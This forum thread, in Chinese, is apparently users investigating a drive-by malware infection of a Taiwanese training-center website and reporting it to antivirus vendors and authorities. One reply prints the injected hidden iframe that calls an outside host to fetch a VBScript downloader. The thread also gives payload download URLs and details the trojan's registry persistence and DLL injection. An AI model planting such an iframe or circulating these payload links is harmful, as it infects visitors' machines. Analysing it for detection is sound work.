【討論】 請問資策會教育訓練中心網站是否有被植入後門程式?
昨天同事告知...最後她做了一條有關media player的註冊機碼刪除
結果導致她登入XP後馬上又登出(安全模式也一樣)..
我自己的AntiVir 7測試結果[url]http://www.iiiedu.org.tw(進首頁就有,其他部份頁面也有[/url]) 的確也是有問題的..
clamav,trend也有欄到病毒但沒全發現,因為我認為該網址其中iframe連結到[url]www.fxkfxk.com的網站中似乎不只一種惡意程式[/url]...
請大家看看手法是不是跟手機王一樣...請資策會處理似乎沒人理...還是我多心
這些程式都誤判了:|||: ..(應該不至於吧...)
總之...org.tw內隱含大陸網站的連結...我覺得很不正常吶...:(
回覆: 【討論】 請問資策會教育訓練中心網站是否有被植入後門程式?
的確有唷
實際抓下來是個vbscript
在download一個
[url]http://www.fxkfxk.com/333/us.exe[/url]
回覆: 【討論】 請問資策會教育訓練中心網站是否有被植入後門程式?
[QUOTE=yuping]的確有唷
實際抓下來是個vbscript
在download一個
[url]http://www.fxkfxk.com/333/us.exe[/url][/QUOTE]
nod32抓的到...XD
Win32/TrojanDownloader.Delf.NJH trojan
:|||: ...
最近攻擊真多...
回覆: 【討論】 請問資策會教育訓練中心網站是否有被植入後門程式?
AVG Anti-Virus FreeEdition 偵測到 "Win32/PEPatch"病毒,會自動從 [url]www.iiiedu.org.tw[/url] 網站下載 PDLL.dll 到 C:\Windows\System\資料夾內,請大家用自己的防毒軟體偵測一下吧~:D
回覆: 【討論】 請問資策會教育訓練中心網站是否有被植入後門程式?
另一個小小心得分享
基本上我這邊連上.....iiied.org.tw總共會經過3道防毒程式的"處理"
已更新至今日的病毒碼
1.clamav (proxy)
2.trend (proxy)
3.AntiVir 7 Free版(本機)
但1,2無法在 proxy把病毒全排除,最後還好本機防毒夠力...
再搭配同事使用symantec 10的經驗...看來我明年得評估AntiVir的
企業解決方案了...:D
回覆: 【討論】 請問資策會教育訓練中心網站是否有被植入後門程式?
請問卡巴斯基能抓到嗎?麻煩各位大大把病毒樣本傳送給卡巴斯基吧
回覆: 【討論】 請問資策會教育訓練中心網站是否有被植入後門程式?
請有偵測到病毒的人向刑事警察局檢舉吧 [url]http://www.cib.gov.tw/mail/Mail_Report.aspx[/url]
回覆: 【討論】 請問資策會教育訓練中心網站是否有被植入後門程式?
[QUOTE=hn1271n]請問卡巴斯基能抓到嗎?麻煩各位大大把病毒樣本傳送給卡巴斯基吧[/QUOTE]
卡巴還掃不到,已回報了:)
回覆: 【討論】 請問資策會教育訓練中心網站是否有被植入後門程式?
以下是這隻木馬的行為:
1. 首頁被植入
<iframe src="hxxp://www.fxkfxk.com/333/us.asp" width="0" height="0" scrolling="no" frameborder="0"></iframe>
2. 檔案 us.asp 是一個 VBScript,它會下載或執行 us.exe。
3. 執行之後,系統會產生:
[Added process]
C:\WINDOWS\svchost.exe
[DLL Injection]
C:\WINDOWS\svchost.exe 注入某些執行程序,例如, svchost.exe 等等。
C:\WINDOWS\system32\PDLL.dll 注入某些執行程序,例如, svchost.exe、explorer.exe 等等。
C:\WINDOWS\winnt.dll 注入某些執行程序,例如, 瀏覽器等等。
C:\WINDOWS\winntKey.DLL 注入某些執行程序,例如, svchost.exe 等等。
[Added service]
NAME=PigeonServer
DISPLAY=PigeonServer
FILE=C:\WINDOWS\winnt.exe
[Drop Files]
C:\Program Files\WindowsUpdate\1.exe
C:\Program Files\WindowsUpdate\2.exe
C:\WINDOWS\svchost.exe
C:\WINDOWS\system32\PDLL.dll
C:\WINDOWS\winnt.dll
C:\WINDOWS\winnt.exe
C:\WINDOWS\winntKey.DLL
[Added Registries]
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon||Value=Userinit||Data=C:\WINDOWS\system32\userinit.exe,C:\WINDOWS\svchost.exe,
回覆: 【討論】 請問資策會教育訓練中心網站是否有被植入後門程式?
Hello,
us.exe - Trojan-Downloader.Win32.Delf.em - new malicious software was found in this file. It's detection will be included in the next update. Thank you for your help.
--
Best regards, Leonid Khovansky
Virus analyst, Kaspersky Lab.
e-mail: [email][email protected][/email]
[url]http://www.kaspersky.com/[/url]
回覆: 【討論】 請問資策會教育訓練中心網站是否有被植入後門程式?
Microsoft Windows MDAC 漏洞 - CVE-2006-0003:
作爲 ActiveX 數據對象 (ADO) 的一部分提供並在 MDAC 中分發的
RDS.Dataspace ActiveX 控件中存在一個遠程代碼執行漏洞。 成功利用此漏
洞的攻擊者可以完全控制受影響的系統。以下爲使用此漏洞通過網頁散播木馬
--------------------------------------------------------------------------
這是一種漏洞行為,防毒程式應該是依照這種行為來作為主要攔截動作,攔截
程式為次要動作。
曾經做過測試,利用此種漏洞下載[URL="http://www.google.com/search?q=HijackThis.exe&hl=zh-TW&lr=lang_zh-TW&start=40&sa=N"]HijackThis.exe[/URL]。防毒程式不但攔截還刪
除該程式。
回覆: 【討論】 請問資策會教育訓練中心網站是否有被植入後門程式?
[QUOTE=hycnet]昨天同事告知...最後她做了一條有關media player的註冊機碼刪除
結果導致她登入XP後馬上又登出(安全模式也一樣)..
我自己的AntiVir 7測試結果[url]http://www.iiiedu.org.tw(進首頁就有,其他部份頁面也有[/url]) 的確也是有問題的..
clamav,trend也有欄到病毒但沒全發現,因為我認為該網址其中iframe連結到[url]www.fxkfxk.com的網站中似乎不只一種惡意程式[/url]...
請大家看看手法是不是跟手機王一樣...請資策會處理似乎沒人理...還是我多心
這些程式都誤判了:|||: ..(應該不至於吧...)
總之...org.tw內隱含大陸網站的連結...我覺得很不正常吶...:([/QUOTE]
與攻擊手機王的手法十分類似,VBScript的寫法相同,把一句話拆成片斷再組合而成。
我點進去沒反應,還以為網頁已經修正,後來才想到火狐對這種攻擊視若無睹,再看原始碼果然那個iframe還在。最近還是少用IE。
最近是否有一批人以同樣的手法嘗試再國內各大網站植入不同的木馬?這可能要向TWNCERT回報吧!
回覆: 【討論】 請問資策會教育訓練中心網站是否有被植入後門程式?
[QUOTE=fq4lxx92]與攻擊手機王的手法十分類似,VBScript的寫法相同,把一句話拆成片斷再組合而成。
我點進去沒反應,還以為網頁已經修正,後來才想到火狐對這種攻擊視若無睹,再看原始碼果然那個iframe還在。最近還是少用IE。
最近是否有一批人以同樣的手法嘗試再國內各大網站植入不同的木馬?這可能要向TWNCERT回報吧![/QUOTE]
是阿...都已跟該單位反應了兩次(不同人接聽)....完全沒改善的跡象...眞不知道該怎麼說:confused:
真是替想到資策會訓練中心上課的"電腦新手"擔心...
還有維護網站的工程師該打屁股了...這樣的維護態度....:mad:
回覆: 【討論】 請問資策會教育訓練中心網站是否有被植入後門程式?
[QUOTE=hycnet]是阿...都已跟該單位反應了兩次(不同人接聽)....完全沒改善的跡象...眞不知道該怎麼說:confused:
真是替想到資策會訓練中心上課的"電腦新手"擔心...
還有維護網站的工程師該打屁股了...這樣的維護態度....:mad:[/QUOTE]
樓上大大也反應啦...:D
我們這邊也有通知資策會過了...
現在還是沒修...
就看他要擺爛到什麼時候吧...:|||:
回覆: 【討論】 請問資策會教育訓練中心網站是否有被植入後門程式?
剛剛總算清掉了...
希望洞有記得補起來阿...XD
回覆: 【討論】 請問資策會教育訓練中心網站是否有被植入後門程式?
害我也好緊張,掃瞄過SYSTEM,無毒,總算安心了!
回覆: 【討論】 請問資策會教育訓練中心網站是否有被植入後門程式?
請問資策會這個網站現在還有病毒嗎[url]http://www.iiiedu.org.tw/Taipei/[/url]
回覆: 【討論】 請問資策會教育訓練中心網站是否有被植入後門程式?
[url]http://www.minami.idv.tw/us.exe[/url]
是否可以幫我看看這個檔案是否還有感染的可能?因為我覺得應該是已經解毒過後剩下的"殘骸"?
並沒有多出新的執行程序,不過執行過後還是感覺怪怪的。
回覆: 【討論】 請問資策會教育訓練中心網站是否有被植入後門程式?
[QUOTE=hn1271n]請問資策會這個網站現在還有病毒嗎[url]http://www.iiiedu.org.tw/Taipei/[/url][/QUOTE]
上星期有大概試了一下"報名課程"的部份..也已去掉iframe的頁面
所以理論上...她們應該有全部檢查過吧...
不過就像前面大大提醒的...有洞得補起來...除非她們內神通外鬼...:(
最後一句是我以小人之心說的..如有冒犯敬請見諒....:D